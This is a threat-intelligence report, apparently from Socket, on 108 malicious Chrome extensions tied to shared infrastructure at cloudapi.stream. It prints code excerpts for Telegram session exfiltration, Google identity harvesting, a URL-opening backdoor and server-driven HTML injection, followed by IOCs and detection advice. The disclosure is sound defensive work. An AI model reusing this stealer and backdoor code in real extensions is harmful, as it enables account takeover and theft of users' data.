108 Chrome Extensions Linked to Data Exfiltration and Session Theft via Shared C2 Infrastructure

17 min read Original article ↗

Sidebar CTA Background

Secure your dependencies with us

Socket proactively blocks malicious open source packages in your code.

Install

Socket's Threat Research Team identified 108 malicious Chrome extensions operating as a coordinated campaign under a shared C2 infrastructure at cloudapi[.]stream. The extensions are published under five distinct publisher identities (Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt) and collectively account for approximately 20k Chrome Web Store installs. All 108 route stolen credentials, user identities, and browsing data to servers controlled by the same operator. The extensions remain live at the time of writing. We have submitted takedown requests to the Chrome Web Store security team and Google Safe Browsing.

The campaign spans several threat categories across 108 extensions:

  • 54 extensions steal Google account identity via OAuth2
  • 1 extension actively exfiltrates Telegram Web sessions every 15 seconds
  • 1 extension includes staged infrastructure for Telegram session theft (not yet activated)
  • 2 extensions strip YouTube security headers and inject ads
  • 1 extension strips TikTok security headers and injects ads
  • 2 extensions inject content scripts into every page the user visits
  • 1 extension proxies all translation requests through the threat actor's server
  • 45 extensions contain a universal backdoor that opens arbitrary URLs on browser start

Socket's AI scanner flagging obifanppcpchlehkjipahhphbcbjekfa as known malware with a behavioral summary of the session exfiltration and account takeover mechanism.

Legitimate on the Surface#

The 108 extensions are published across several product categories: Telegram sidebar clients, slot machine and Keno games, YouTube and TikTok enhancers, a text translation tool, and page utility extensions. Each targets a different type of user, but all share the same backend.

Users installing a Telegram sidebar extension see a functional chat interface. Users installing a slot game get a working game. The legitimate surface exists, but so does malicious code running in the background, connected to a C2 server that can steal identities, exfiltrate sessions, and open arbitrary URLs in the user's browser.

Telegram Session Theft#

The most severe extension in the campaign is Telegram Multi-account (obifanppcpchlehkjipahhphbcbjekfa). It steals the active Telegram Web session from the victim's browser and transmits it to tg[.]cloudapi[.]stream/save_session.php every 15 seconds.

How the theft works:

The extension injects content.js into https://web.telegram.org/* at document_start. On load, it immediately calls getSessionDataJson(), which serializes the page's entire localStorage and extracts the user_auth token used by Telegram Web to authenticate the session. It sends this to the background script via chrome.runtime.sendMessage, which relays it to the C2 server.

// content.js
// Analyst note: Runs immediately on page load, before the user interacts with anything.
let getInfo = getSessionDataJson();
if (getInfo.user_id !== null) {
    chrome.runtime.sendMessage({ action: "save_session", data: JSON.stringify(getInfo) });
}

After the initial theft, a polling loop re-exfiltrates the session indefinitely:

// content.js
// Analyst note: Sends the full session to the C2 every 15 seconds for the lifetime of the tab.
setInterval(async () => {
    let getInfo = getSessionDataJson();
    if (getInfo.user_id !== null) {
        await chrome.runtime.sendMessage({ action: "save_session", data: JSON.stringify(getInfo) });
    }
}, 15000);

The background script (background.js) then POSTs the data to the C2:

// background.js
let answr = await postJson('https://tg[.]cloudapi[.]stream/save_session.php', {
    uuid: result.uuid,
    session: xJsonData
});

Full account takeover:

The extension also handles an inbound message (set_session_changed) that performs the reverse operation: it clears the victim's localStorage, overwrites it with threat actor-supplied session data, and force-reloads Telegram. This allows the operator to swap any victim's browser into a different Telegram account without the victim's knowledge.

// content.js
// Analyst note: The C2 can push any session data back to the extension.
// This replaces the victim's active Telegram session with the threat actor's chosen session.
if (message.action === 'set_session_changed') {
    let data = JSON.parse(message.data);
    localStorage.clear();
    clearAllCookies();
    for (var k in data) { localStorage.setItem(k, data[k]); }
    setTimeout(() => { window.location = "https://web.telegram.org/k/?r_=" + Math.random(); }, 500);
}

A 30-second heartbeat (sidepanel.js) polls tg[.]cloudapi[.]stream/count_sessions.php, giving the operator a live view of how many active sessions are available.

Staged Telegram stealer (Teleside):

A second extension, Web Client for Telegram - Teleside (mdcfennpfgkngnibjbpnpaafcjnhcjno, approximately 1,000 installs), has all the infrastructure for session theft: it strips Telegram's CSP, X-Frame-Options, and CORS headers via declarativeNetRequest, injects a content script at document_start on telegram.org, and sets web_accessible_resources: ["*"]. The active theft code is absent from v3.8.0. The extension is based on a trojanized SidebarGPT codebase. The loadInfo() backdoor present in the background script would allow the operator to activate or update the payload without pushing a Chrome Web Store update. Additionally, content-sidebar.html displays an active gambling overlay: a gameSession div set to display:block that serves a full-size banner from multiaccount[.]cloudapi[.]stream/game.html directly over the extension sidebar.

Google Account Identity Harvesting#

54 of the 108 malicious extensions steal the user's Google account identity the first time the user clicks the sign-in button. The code is identical across all 54:

  1. chrome.identity.getAuthToken({ interactive: true }) acquires a Google OAuth2 Bearer token.
  2. The extension fetches https://www.googleapis.com/oauth2/v3/userinfo with that token.
  3. It POSTs {email, name, picture, sub} to https://mines[.]cloudapi[.]stream/auth_google.
// popup/auth.js (akebbllmckjphjiojeioooidhnddnplj, and 53 identical copies across the campaign)
// (Russian comment): // Проверка на уже авторизованного пользователя
//   ("Check for already authenticated user")

loginBtn.addEventListener("click", async () => {
  chrome.identity.getAuthToken({ interactive: true }, async (token) => {
    // Analyst note: token is a real Google OAuth2 Bearer token acquired via the
    // chrome.identity API. The user sees a standard Google sign-in prompt.
    const res = await fetch("https://www.googleapis.com/oauth2/v3/userinfo", {
      headers: { Authorization: `Bearer ${token}` }
    });
    const profile = await res.json();

    // Analyst note: The profile is sent to the threat actor's server, not to any
    // legitimate backend for the extension's stated functionality.
    const r = await fetch("https://mines[.]cloudapi[.]stream/auth_google", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({
        email: profile.email,
        name: profile.name,
        picture: profile.picture,
        sub: profile.sub   // Persistent Google account identifier
      })
    });
  });
});

The OAuth token is used locally and never leaves the browser. What reaches the operator's server is only a permanent identity record: the victim's email, name, and profile picture.

The sub field is a stable, cross-service Google account identifier that does not change when a user changes their password or email address. Combined with the email and name, it gives the operator a persistent record of each victim's Google identity linked to their extension-assigned user_id on the cloudapi[.]stream backend. This does not give the operator access to the victim's Google account.

All 54 extensions use OAuth2 client IDs from only two Google Cloud projects: project 1096126762051 (31 client IDs) and project 170835003632 (25 client IDs). 56 unique client IDs across 54 extensions all trace to the same two project numbers, proving a single operator controls all publisher accounts despite five different publisher names on the Chrome Web Store.

Universal Backdoor: loadInfo()#

45 extensions in the campaign include an identical function in their background script. It runs once on every browser startup:

// background.js (present in 45 extensions, confirmed by automated grep across extracted CRX files)
// Analyst note: This runs automatically when Chrome starts and the service worker initializes.
// The server can return any URL to be opened as a new tab in the victim's browser.
async function loadInfo() {
  const response = await fetch("https://mines[.]cloudapi[.]stream/user_info", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ type: 'background', ext: chrome.runtime.id })
  });
  const result = await response.json();
  if (result && result.success && result.infoURL) {
    chrome.tabs.create({ url: result.infoURL });
  }
}
loadInfo();

The operator's server receives the extension ID on every browser start. If the response includes infoURL, the extension silently opens that URL in a new tab. There is no restriction on what URL the server can return. This channel survives browser restarts and operates independently of whether the user ever opens the extension.

In two extensions (Page Locker and Page Auto Refresh), the loadInfo() function is stylistically inconsistent with the surrounding minified code: it uses clean async/await syntax while the rest of the file is minified. This indicates the function was injected after the extension's original code was written, consistent with an operator who acquired or repurposed existing extensions and added the backdoor.

innerHTML Injection#

The same user_info response that carries infoURL also drives direct DOM injection across 78 extensions. Every game and casino extension in the campaign includes a userpage.js file that takes two fields from the C2 response and writes them into the page using innerHTML with no sanitization:

  // app/userpage.js (present across 78 extensions)
  // Analyst note: result.rating and result.protxt arrive from mines[.]cloudapi[.]stream/user_info.
  // No sanitization before DOM assignment — the C2 can push arbitrary HTML to any user's extension page.
  if (result.rating) {
      ratingPlayers.innerHTML = result.rating;
  }
  if (result.protxt) {
      proplansID.innerHTML = result.protxt;
      proplansID.classList.remove('h_');
  }

result.rating populates the leaderboard panel. result.protxt populates the Pro Plans upsell section and un-hides it. The C2 server can substitute either field with arbitrary HTML, including script blocks, on any visit to the extension's UI. This is a distinct injection channel from loadInfo(): where the backdoor opens a new tab, server-controlled content injection rewrites the extension's own interface.

Five extensions use Chrome's declarativeNetRequest API to strip security headers from target sites before the page loads. The pattern is identical across all five: remove Content-Security-Policy, X-Frame-Options, and Content-Security-Policy-Report-Only; set Access-Control-Allow-Origin: *; and spoof the User-Agent, Origin, and Referer headers to impersonate the target site itself.

The five extensions and their targets:

  • Telegram Multi-account (obifanppcpchlehkjipahhphbcbjekfa): targets web.telegram.org, spoofs User-Agent to iPhone Safari
  • Teleside (mdcfennpfgkngnibjbpnpaafcjnhcjno): targets web.telegram.org, spoofs User-Agent to iPhone Safari
  • YouSide (mmecpiobcdbjkaijljohghhpfgngpjmk): targets youtube.com, spoofs User-Agent to Chrome 140
  • SideYou (bfoofgelpmalhcmedaaeogahlmbkopfd): targets youtube.com, spoofs User-Agent to Chrome 125
  • Web Client for TikTok (cbfhnceafaenchbefokkngcbnejached): targets www.tiktok.com, spoofs User-Agent to Chrome 125

All five were confirmed by reading rules_1.json directly from each extracted CRX file.

YouSide additionally injects a gambling overlay into its sidebar: a gameSession div set to display:block placing a banner ad from multiaccount[.]cloudapi[.]stream/game.html over the YouTube embed.

The TikTok extension adds a second declarativeNetRequest rule that unconditionally allows all WebSocket connections on all URLs, removing any network-level restriction on WebSocket traffic from TikTok pages. Its content script (sys-content.js) injects a link and image from multiaccount[.]cloudapi[.]stream/game.html into every TikTok page the user visits.

The ukraine.html file bundled with the TikTok extension serves as its privacy policy. It contains the contact email kiev3381917@gmail[.]com and carries the page title "Privacy Policy - Telegram Sidebar Extension," a copy-paste artifact from a different extension in the campaign confirming the same author wrote both.

Translation Proxy#

Text Translation (ogogpebnagniggbnkbpjioobomdbmdcj) presents as a standard translation sidebar. When a user registers, the extension sends their email and full name to https://api[.]cloudapi[.]stream:8443/Register and receives an API key in return.

// main.js
// Analyst note: User email and name are sent to the threat actor's server at registration.
// The returned API key is stored in localStorage and attached to every translation request.
const url = 'https://api[.]cloudapi[.]stream:8443/Register';
// ...
localStorage.setItem('settings', JSON.stringify({
    email: $("#email").val(),
    name: $("#name").val(),
    key: result_.key
}));

Every translation request goes through https://api[.]cloudapi[.]stream:8443/Translation with the user's API key attached as an X-Key header. The operator's server receives the full text of everything the user submits for translation. This extension requests only the sidePanel permission and no host permissions, so it generates no permission warnings during installation.

C2 Infrastructure#

All 108 malicious extensions share the same backend, hosted at 144[.]126[.]135[.]238 (Contabo GmbH VPS). The domain cloudapi[.]stream was registered on April 30, 2022 through Hosting Ukraine LLC. The server runs a Strapi CMS instance on port 1337 with a PostgreSQL database.

The confirmed subdomains and their roles:

  • tg[.]cloudapi[.]stream: Telegram session exfiltration, six endpoints including /save_session.php, /get_sessions.php, /delete_session.php, and /count_sessions.php (7 extensions)
  • mines[.]cloudapi[.]stream: identity theft via /auth_google, C2 beacon via /user_info (returns infoURL for remote tab-open), user state persistence (used by 94 extensions)
  • topup[.]cloudapi[.]stream: payment and monetization portal, confirming the MaaS model (linked from 78 extensions)
  • cdn[.]cloudapi[.]stream: game asset hosting (79 extensions)
  • multiaccount[.]cloudapi[.]stream: ad injection hub, injected directly into TikTok and other pages (29 extensions)
  • gamewss[.]cloudapi[.]stream: WebSocket game server on port 8447 (6 extensions)
  • wheel[.]cloudapi[.]stream: pre-positioned in host_permissions of 76 extensions but not used in any observed code
  • api[.]cloudapi[.]stream:8443: translation API, user registration and content surveillance (1 extension)
  • chat[.]cloudapi[.]stream: chat service (5 extensions)

A secondary domain, top[.]rodeo, is listed in the host_permissions of 71 extensions and used as a game server backend. Two endpoint variants appear in source code: /server/remote.php and /server/remote3.php, both accepting uuid and extension_id parameters. The topup[.]cloudapi[.]stream payment portal and the per-user user_id system confirm this is operated as a Malware-as-a-Service platform. Victims are assigned accounts in the backend CRM, and stolen identities and sessions are accessible to whoever purchases access.

Chrome Web Store listings showing all three developer URLs used across the campaign: https://top[.]rodeo/ (Telegram Multi-account and Black Beard Slot Machine), https://webuk[.]tech/ (Page Locker), and https://interalt[.]net/ (InterAlt).

Chrome Web Store Policy Violations#

1. Direct CWS privacy declaration contradiction

Every extension's CWS listing contains a boilerplate declaration: "This developer declares that your data is not being used or transferred for purposes unrelated to the item's core functionality." The code sending user_id to mines[.]cloudapi[.]stream/user_info on every browser start, harvesting Google identity via auth_google, and opening operator-specified URLs has nothing to do with the stated function of a slot game or Telegram client. This is a verifiable lie in the listing itself, not an interpretation.

2. Google API Services User Data Policy - Limited Use

Extensions using chrome.identity.getAuthToken are bound by Google's Limited Use requirements. Profile data obtained via OAuth2 must only be used for the feature the user explicitly triggered. Routing it to a third-party C2 server with no disclosed relationship to the extension is a direct violation regardless of whether the token itself is exfiltrated.

3. CWS Ads Policy

Injecting a gambling overlay (multiaccount[.]cloudapi[.]stream/game.html) into the extension UI without any user consent or disclosure in the CWS listing violates the chrome web store policy requiring that any advertising be clearly disclosed. In Teleside and YouSide, the ad replaces the stated UI entirely.

Attribution#

The contact email kiev3381917@gmail[.]com appears in ukraine.html, a privacy policy HTML file bundled with the SideYou extension (bfoofgelpmalhcmedaaeogahlmbkopfd). The same file is reused across extensions: the copy found in Web Client for TikTok carries the title "Privacy Policy - Telegram Sidebar Extension" unchanged, directly linking the two extensions to the same author.

Three of the seven registered email addresses contain romanization variants of the same string “nadejdin” and “nadiezhdin”: nadejdinv@gmail[.]com (linked to 16 extensions), viktornadiezhdin@gmail[.]com (12 extensions), and slava.nadejdin.kiev@gmail[.]com (2 extensions).

Code comments in Russian appear in the authentication and session theft code across multiple extensions. In content.js , the comment reads "userId ne najden" (userId not found) and in auth.js , reads "Proverka na uzhe avtorizovannogo pol'zovatelya" (Check for already authenticated user).

Shodan scan of 144[.]126[.]135[.]238 confirming Contabo Inc. hosting, ISP Nubes LLC (AS40021), and nine open ports including a Strapi API server on 1337 and PostgreSQL on 5432.

Five publisher names on the Chrome Web Store (Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt) all resolve to the same two Google Cloud project numbers: 1096126762051 and 170835003632. This is the strongest single piece of evidence for unified ownership, as 56 unique OAuth2 client IDs across all 54 identity-stealing extensions share only these two project roots.

Impact#

Users who installed any of the 54 identity-stealing extensions and clicked the sign-in button have had their Google email, full name, profile picture URL, and Google account identifier (sub) transmitted to mines[.]cloudapi[.]stream/auth_google. The sub value does not change when a user changes their password or email address.

Users who installed Telegram Multi-account (obifanppcpchlehkjipahhphbcbjekfa) and opened web.telegram.org while the extension was active have had their Telegram Web session exfiltrated at 15-second intervals. A threat actor with a stolen session can access all messages, contacts, and linked accounts without the user's password or two-factor authentication code.

Any browser with one of the 45 loadInfo() backdoor extensions installed responds to server-issued commands on every browser start, even if the user never opens the extension.

Across all 108 extensions, approximately 20k installs are on record. The extensions targeting Telegram account for roughly 3,035 of those installs.

topup[.]cloudapi[.]stream now serves a RODEO GAMES STUDIO about page describing a Chrome Extension monetization business with "well-thought-out monetization" and listing formatron.service@gmail[.]com as a support contact.

Outlook and Recommendations#

For users:

  • Search your installed Chrome extensions for any of the extension IDs in the IOC section below and remove them immediately.
  • If you used Telegram Multi-account (obifanppcpchlehkjipahhphbcbjekfa) while logged into Telegram Web, log out of all Telegram Web sessions from the Telegram mobile app under Settings > Devices > Terminate all other sessions.
  • If you signed into any of the slot game, casino, or sidebar extensions using Google, treat your Google identity as exposed. Review third-party app access at myaccount.google.com/permissions and revoke any unfamiliar entries.
  • If you installed Text Translation (ogogpebnagniggbnkbpjioobomdbmdcj) and registered with your email, that email address and name are stored on the threat actor's server.

For security teams:

  • Block cloudapi[.]stream and all its subdomains at the network level. The full list is in the IOC section below.
  • Block top[.]rodeo.
  • Flag Chrome extensions in your environment that declare the identity permission alongside oauth2 client IDs from Google Cloud project numbers 1096126762051 or 170835003632.
  • The loadInfo() pattern (POST to /user_info on service worker startup with the extension ID, open infoURL from response) is a detectable fingerprint. Scan extension bundles for the combination of user_info, infoURL, and chrome.tabs.create.
  • declarativeNetRequest rules that remove content-security-policy from named target sites are not standard behavior and warrant review in any extension.

Socket's Chrome extension protection analyzes extension bundles for hidden data flows, undisclosed credential exfiltration, and C2 backdoors, blocking malicious extensions before they reach user endpoints.

MITRE ATT&CK#

  • T1176 - Browser Extensions
  • T1539 - Steal Web Session Cookie
  • T1528 - Steal Application Access Token
  • T1041 - Exfiltration Over C2 Channel
  • T1071.001 - Application Layer Protocol: Web Protocols
  • T1027 - Obfuscated Files or Information
  • T1185 - Browser Session Hijacking

Indicators of Compromise (IOCs)#

Threat Actor Identifiers

Email address

  • kiev3381917@gmail[.]com
  • formatron.service@gmail[.]com
  • nashprom.info@gmail[.]com
  • viktornadiezhdin@gmail[.]com
  • support@top[.]rodeo
  • slava.nadejdin.kiev@gmail[.]com
  • nadejdinv@gmail[.]com

Publisher name

  • Yana Project
  • GameGen
  • SideGames
  • Rodeo Games
  • InterAlt

Project Credentials

  • Google Cloud Project: 1096126762051
  • Google Cloud Project: 170835003632

Network Indicators

  • cloudapi[.]stream
  • tg[.]cloudapi[.]stream
  • mines[.]cloudapi[.]stream
  • topup[.]cloudapi[.]stream
  • cdn[.]cloudapi[.]stream
  • multiaccount[.]cloudapi[.]stream
  • wheel[.]cloudapi[.]stream
  • gamewss[.]cloudapi[.]stream
  • api[.]cloudapi[.]stream
  • chat[.]cloudapi[.]stream
  • crm[.]cloudapi[.]stream
  • top[.]rodeo
  • metal[.]cloudapi[.]stream
  • 144[.]126[.]135[.]238
  • coin-miner[.]cloudapi[.]stream
  • goldminer[.]cloudapi[.]stream
  • herculessportslegend[.]cloudapi[.]stream

C2 Endpoints

  • tg[.]cloudapi[.]stream/save_session.php
  • tg[.]cloudapi[.]stream/count_sessions.php
  • tg[.]cloudapi[.]stream/get_sessions.php
  • tg[.]cloudapi[.]stream/get_session.php
  • tg[.]cloudapi[.]stream/delete_session.php
  • tg[.]cloudapi[.]stream/save_title.php
  • mines[.]cloudapi[.]stream/auth_google
  • mines[.]cloudapi[.]stream/user_info
  • mines[.]cloudapi[.]stream/slot_test/
  • api[.]cloudapi[.]stream:8443/Register
  • api[.]cloudapi[.]stream:8443/Translation
  • top[.]rodeo/server/remote.php
  • top[.]rodeo/server/remote3.php
  • top[.]rodeo/notify.php
  • cloudapi[.]stream/install/
  • cloudapi[.]stream/uninstall/

Chrome Extension IDs

  1. obifanppcpchlehkjipahhphbcbjekfa - Telegram Multi-account
  2. mdcfennpfgkngnibjbpnpaafcjnhcjno - Web Client for Telegram - Teleside
  3. mmecpiobcdbjkaijljohghhpfgngpjmk - YouSide - Youtube Sidebar
  4. bfoofgelpmalhcmedaaeogahlmbkopfd - Web Client for Youtube - SideYou
  5. cbfhnceafaenchbefokkngcbnejached - Web Client for TikTok
  6. ogogpebnagniggbnkbpjioobomdbmdcj - Text Translation
  7. ldmnhdllijbchflpbmnlgndfnlgmkgif - Page Locker
  8. lnajjhohknhgemncbaomjjjpmpdigedg - Page Auto Refresh
  9. aecccajigpipkpioaidignbgbeekglkd - Web Client for Rugby Rush - SideGame
  10. akebbllmckjphjiojeioooidhnddnplj - Formula Rush Racing Game
  11. akifdnfipbeoonhoeabdicnlcdhghmpn - Piggy Prizes - Slot Machine
  12. akkkopcadaalekbdgpdikhdablkgjagd - Slot Arabian
  13. alkfljfjkpiccfgbeocbbjjladigcleg - Frogtastic
  14. alllblhkgghelnejlggmmgjbkdabidie - Black Beard Slot Machine
  15. amkkjdjjgiiamenbopfpdmjcleecjjgg - Indian - Slot Machine
  16. amnaljnjmgajgajelnplfmidgjgbjfhe - Mahjong Deluxe
  17. bbjdlbemjklojnbifkgameepcafflmem - Crazy Freekick
  18. bdnanfggeppmkfhkgmpojkhanoplkacc - Slot Car Racing
  19. bgdkbjcdecedfoejdfgeafdodjgfohno - Clear Cache Plus
  20. bnchgibgpgmlickioneccggfobljmhjc - Galactica Delux - Slot Machine
  21. bpljfbcejldmgeoodnogeefaihjdgbam - Speed Test for Chrome - WiFi SpeedTest
  22. cbnekafldflkmngbgmbnfmchjaelnhem - Game SkySpeedster
  23. cdpiopekjeonfjeocbfebemgocjciepp - Master Chess
  24. cehdkmmfadpplgchnbjgdngdcjmhlfcc - Hockey Shootout
  25. cljengcehefhflhoahaambmkknjekjib - Odds Of The Gods - Slot Machine
  26. clpgopiimdjcilllcjncdkoeikkkcfbi - Billiards Pro
  27. cmeoegkmpbpcoabhlklbamfeidebgmdf - Three Card Poker
  28. cmlbghnlnbjkdgfjlegkbjmadpbmlgjb - Donuts - Slot Machine
  29. cnibdhllkgidlgmaoanhkemjeklneolk - Archer - Slot Machine
  30. cpnfioldnmhaihohppoaebillnambcgn - Rugby Rush
  31. dbohcpohlgnhgjmfkakoniiplglpfhcb - Bingo
  32. dcamdpfclondppklabgkfaofjccpioil - Web Client for game Cricket Batter Challenge
  33. dljlpildgknddpnahppkihgodokfjbnd - Slot Machine Zeus Treasures
  34. dlpiookhionidajbiopmaajeckifeehn - Horse Racing
  35. dmaibhbbpmdihedidicfeigilkbobcog - Aztec - Slot Machine
  36. dohenclhhdfljpjlnpjnephpccbdgmmb - Straight 4
  37. dpdemambcedffmnkfmkephnhhnclmcio - Slot The Gold Pot
  38. ejlcbfmhjbkgohopdkijfgggbikgbacb - American Roulette Royale
  39. eljfpgehlncincemdmmnebmnlcmfamhm - Asia Slot
  40. enmmilgindjmffoljaojkcgloakmloen - Web Client for game Drive Your Car
  41. eoklnfefipnjfeknpmigmogeeepddcch - Jurassic Giants - Slot Machine
  42. fddajeklkkggbnppabbhkdmnkdjindlo - Street Basketball
  43. fibgndhgobbaaekmnneapojgkcehaeac - Tarot Side Panel
  44. fjfhejmbhpabkacpoddjbcfandjoacmb - Dragon Slayer - Slot Machine
  45. flkdjodmoefccepdihipjdlianmkmhgc - Best Blackjack
  46. fmajpchoiahphjiligpmghnhmabolhoh - Book Of Magic - Slot Machine
  47. gaafhblhbnkekenogcjniofhbicchlke - Snake - Slot Machine
  48. gbaoddbbpompjhmilbgiaapkkakldlpc - Dice King - Classic Craps And Roll Game
  49. gbhhgipmedccnankkjchgcidiigmioio - Slot Ramses
  50. gfhcdakcnpahfdealajmhcapnhhablbp - Battleship War
  51. gipmochingljoikdjakkdolfcbphmlom - Gold Miner 2
  52. glofhphmolanicdaddgkmhfmjidjkaem - Greyhound Racing - Dog Race Simulator
  53. haochenfmhglpholokliifmlpafilfdc - Hercules: Sports Legend
  54. hbobdcfpgonejphpemijgjddanoipbkj - Flicking Soccer
  55. hdmppejcahhppjhkncagagopecddokpi - Voodoo Magic - Slot Machine
  56. heljkmdknlfhiecpknceodpbokeipigo - Web Client for Hockey Shootout - SideGame
  57. hiofkndodabpioiheinoiojjobadpgmj - MASTER CHECKERS
  58. hkbihmjhjmehlocilifheeaeiljabenb - Watercraft Rush
  59. hlmdnedepbbihmbddepemmbkenbnoegd - Car Rush
  60. hmlnefhgicedcmebmkjdcogieefbaagl - Video Poker Deuces Wild
  61. hnpbijogiiaegambgpaenjbcbgaeimlf - Slot Machine Ultimate Soccer
  62. ibelidmkbnjmmpjgfibbdbkamgcbnjdm - Christmas Eve - Slot Machine
  63. ihbkmfoadnfjgkpdmgcboiehapkiflme - Columbus Voyage - Slot Machine
  64. ijccacgjefefdpglhclnbpfjlcbagafm - High or Low Casino Game
  65. ijfmkphjcogaealhjgijjfjlkpdhhojk - Goalkeeper Challenge
  66. ijpgccpmogehkjhdmomckpkfcpbjlmnj - Tropical Beach - Slot Machine
  67. imjmnghlhiimodfkdkgnfplhlobehnpm - BlackJack 3D
  68. jddinhnhplibccfmniaakhffpjpnaglp - Web Client for game Classic Bowling
  69. jmopjanoebpdbopigcbpjhiigmjolikk - Raging Zeus Mines
  70. jnmmbmkmbkcccpihjgnhjmhhkokfdnfe - Classic Backgammon
  71. jodocbbdcdclkhjkibnlfhbmllcpfkfo - Slot Machine The Fruits
  72. kahcolfecjbejjjadhjafmihdnifonjf - Baccarat
  73. kblomapfkjidbbbdllmofkcakcenkmec - Mini Golf World
  74. kbmindomjiejdikjaagfdbdfpnlanobi - Gold Rush - Slot Machine
  75. kbnkkecifeppobnemkielnpagifkobki - Pirat Slot
  76. kjnakdbpijigdbfepipnbafnhbcfdkga - 40 Imperial Crown - Slot Machine
  77. kknakidneabpfgepadgpkibalcnabnnh - 3D Soccer Slot Machine
  78. klglejfbdeipgklgaepnodpjcnhaihkd - Premium Horse Racing
  79. kmiidcaojgeepjlccoalkdimgpfnbagj - Tanks Game
  80. lcijkepobdokkgmefebkiejhealgblle - Caribbean Stud Poker
  81. lefndgfmmbdklidbkeifpgclmpnhcilg - Wild Buffalo - Slot Machine
  82. lfkknbmaifjomagejflmjklcmpadmmdg - Aqua - Slot Machine
  83. ljbgkfbiifhpgpipepnfefijldolkhlm - Game Crypto Merge
  84. lmcpbhamfpbonaenickjclacodolkbdl - Sherwood Forest - Slot Machine
  85. lmgenhmehbcolpikplhkoelmagdhoojn - Web Client for game Fatboy Dream
  86. maeccdadgnadblfddcmanhpofobhgfme - Lone Star Jackpots - Slot Machine
  87. medkneifmjcpgmmibfppjpfjbkgbgebl - Hidden Kitty Game
  88. mheomooihiffmcgldolenemmplpgoahn - Keno
  89. mmbbjakjlpmndjlbhihlddgcdppblpka - Jokers Bonanza - Slot Machine
  90. mmbkmjmlnhocfcnjmbchmflamalekbnb - Penalty Kicks
  91. nbgligggjfgkpphhghhjdoiefbimgooc - Pai Gow Poker
  92. ncpdkpcgmdhhnmcjgiiifdhefmekdcnf - Metal Calculator
  93. ndajcmifndknmkckdcdefkpgcodciggk - Farm - Slot Machine
  94. nelbpdjegmhhgpfcjclhdmkcglimkjpp - Rail Maze Puzzle
  95. nkacmelgoeejhjgmmgflbcdhonpaplcg - RED DOG CARD GAME
  96. nmegibgeklckejdlfhoadhhbgcdjnojb - Coin Miner 2
  97. nodobilhjanebkafmpihkpoabiggnnfl - Black Ninja - Slot Machine
  98. oanpifaoclmgmflmddlgkikfaggejobn - Pyramid Solitaire
  99. ocflhkadmmnlbieoiiekfcdcmjcfeahe - Chrome Client for Downhill Ski - SideGame
  100. odeccdcabdffpebnfancpkepjeecempn - Slot Machine Mr Chicken
  101. oejhnncfanbaogjlbknmlgjpleachclf - Web Client for French Roulette - SideGame
  102. ogbaedmbbmmipljceodeimlckohbnfan - 3D Roulette Casino Game
  103. ojkbafekojdcedacileemekjdfdpkbkf - Slot Machine Space Adventure
  104. pdgaknahllnfldmclpcllpieafkaibmf - Whack 'em All
  105. peflgkmfmoijonfgcjdlpnnfdegnlaji - Video Poker Jacks or Better
  106. phfkdailnomcbcknpdmokejhellbecjb - Swimming Pro
  107. pkghgkfjhjghinikeanecbgjehojfhdg - InterAlt
  108. pllkanemicadpcmkfodglahcocfdgkhj - Gold of Egypt - Slot Machine